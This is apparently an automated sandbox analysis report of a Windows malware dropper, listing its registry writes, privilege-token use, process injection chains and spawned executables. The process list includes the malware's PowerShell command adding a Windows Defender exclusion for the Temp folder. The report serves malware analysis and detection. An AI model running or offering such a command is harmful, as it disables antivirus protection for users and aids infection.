Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Users\Admin\AppData\Local\Temp\uugw3lq1.b1o\anyname.exe N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-JOLEN.tmp\ultramediaburner.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-JOLEN.tmp\ultramediaburner.tmp N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat19c6762a08beae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat19c6762a08beae.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat19c6762a08beae.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\avwvuuw N/A
N/A N/A C:\Users\Admin\AppData\Roaming\avwvuuw N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat191649b47c9e2.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\795168.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\7915684.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\6384253.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\ProgramData\6384253.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WerFault.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7e-3199b-ad4-385bd-5a896535a5cb6\Maeqeshyhoto.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1996 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1996 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1996 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1996 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1996 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1996 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1996 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1744 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe
PID 1744 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe
PID 1744 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe
PID 1744 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe
PID 1744 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe
PID 1744 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe
PID 1744 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe
PID 1068 wrote to memory of 1480 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 1480 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 1480 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 1480 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 1480 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 1480 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 1480 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 972 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 972 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 972 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 972 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 972 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 972 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 972 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1480 wrote to memory of 1884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1480 wrote to memory of 1884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1480 wrote to memory of 1884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1480 wrote to memory of 1884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1480 wrote to memory of 1884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1480 wrote to memory of 1884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1480 wrote to memory of 1884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 800 wrote to memory of 676 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe
PID 800 wrote to memory of 676 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe
PID 800 wrote to memory of 676 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe
PID 800 wrote to memory of 676 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe
PID 800 wrote to memory of 676 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe
PID 800 wrote to memory of 676 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe
PID 800 wrote to memory of 676 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe
PID 1068 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 920 N/A C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe

"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat191649b47c9e2.exe

C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe

Sat196ac06a9e6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19e4750dd01.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat191649b47c9e2.exe

Sat191649b47c9e2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat199ba8a4637dcb034.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1946eb84e6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat196ac06a9e6.exe

C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat19e6a852f849bb2.exe

